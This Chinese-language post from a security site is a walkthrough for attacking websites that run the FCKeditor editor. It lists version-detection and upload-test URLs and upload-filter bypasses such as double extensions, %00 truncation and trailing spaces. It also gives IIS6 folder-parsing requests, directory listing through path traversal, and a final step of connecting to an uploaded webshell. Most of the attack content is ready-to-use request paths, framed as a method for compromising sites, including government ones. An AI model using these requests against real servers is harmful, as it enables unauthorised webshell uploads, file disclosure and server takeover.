首页 > 知识 > 修改
【页面双击滚屏】
标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2668]   作者: 闲云野鸡 发表于: [2020-05-19]

本文共 [478] 位读者顶过

一. 关于FCKeditor[出自:jiwo.org]

FCKeditor是一个网页的文本编辑器,在很多的cms里都有出现。近日工作期间遇到了不下十个有FCKeditor的站,尤其是ZF网站。
本文简单介绍通过FCKeditor上传漏洞进行攻击的思路,并对可能用到的操作进行整理。

二. 攻击思路
1.查看FCKeditor版本

查看版本.png
Fckeditor上传各版本绕过.png
 
    
	
	
  1. 
		http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
	
    2. 

	
  2. 
		http://127.0.0.1/FCKeditor/_whatsnew.html
	
    3.
2.测试上传点
    
	
	
  1. 
		FCKeditor/editor/filemanager/browser/default/connectors/test.html
	
    2. 

	
  2. 
		FCKeditor/editor/filemanager/upload/test.html
	
    3. 

	
  3. 
		FCKeditor/editor/filemanager/connectors/test.html
	
    4. 

	
  4. 
		FCKeditor/editor/filemanager/connectors/uploadtest.html
	
    5. 

	
  5. 
		 
	
    6. 

	
  6. 
		FCKeditor/_samples/default.html
	
    7. 

	
  7. 
		FCKeditor/_samples/asp/sample01.asp
	
    8. 

	
  8. 
		FCKeditor/_samples/asp/sample02.asp
	
    9. 

	
  9. 
		FCKeditor/_samples/asp/sample03.asp
	
    10. 

	
  10. 
		FCKeditor/_samples/asp/sample04.asp
	
    11. 

	
  11. 
		FCKeditor/_samples/default.html
	
    12. 

	
  12. 
		FCKeditor/editor/fckeditor.htm
	
    13. 

	
  13. 
		FCKeditor/editor/fckdialog.html
	
    14. 

	
  14. 
		 
	
    15. 

	
  15. 
		FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
	
    16. 

	
  16. 
		FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
	
    17. 

	
  17. 
		FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
	
    18. 

	
  18. 
		FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
	
    19. 

	
  19. 
		FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
	
    20. 

	
  20. 
		FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
	
    21. 

	
  21. 
		FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
	
    22. 

	
  22. 
		FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp
	
    23. 

	
  23. 
		 
	
    24. 

	
  24. 
		FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
	
    25. 

	
  25. 
		FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
	
    26. 

	
  26. 
		fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
	
    27. 

	
  27. 
		fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
	
    28. 

	
  28. 
		 
	
    29.
3.突破限制
3.1 上传限制
上传限制的突破方式很多,主要还是抓包改扩展名,%00截断,添加文件头等

3.2 文件名限制
3.2.1二次上传绕过文件名‘ . ’ 修改为‘ _ ’
FCK在上传了诸如shell.asp;.jpg的文件后,会自动将文件名改为shell_asp;.jpg。可以继续上传同名文件,文件名会变为shell.asp;(1).jpg

截断.png
3.2.2提交shell.php+空格绕过
空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。

3.3 IIS6.0突破文件夹限制
    
	
	
  1. 
		Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
	
    2. 

	
  2. 
		FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
	
    3. 

	
  3. 
		FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
	
    4.
3.4 文件解析限制
通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。
    
	
	
  1. 
		http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg
	
    2.
4.列目录
4.1 FCKeditor/editor/fckeditor.html
FCKeditor/editor/fckeditor.html不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页,可以查看已经上传的文件。

4.2 根据xml返回信息查看网站目录
    
	
	
  1. 
		http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
	
    2. 

	
  2. 
		 
	
    3.
4.3 获取当前文件夹
    
	
	
  1. 
		FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
	
    2. 

	
  2. 
		FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
	
    3. 

	
  3. 
		FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
	
    4. 

	
  4. 
		 
	
    5.
4.4 浏览D盘文件
    
	
	
  1. 
		/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=D:/
	
    2. 

	
  2. 
		 
	
    3.
5. 连接木马
在木马能够解析之后,使用各类工具连接到木马,获取webshell。至此,利用FCKeditor进行文件上传并攻击的过程就已经完成。

评论

暂无
发表评论
 返回顶部 
热度(478)
 关注微信 
v1.4 by jiwo@jiwo.org   Copyright © 2016-2046 机窝安全   
京ICP备16002041号-2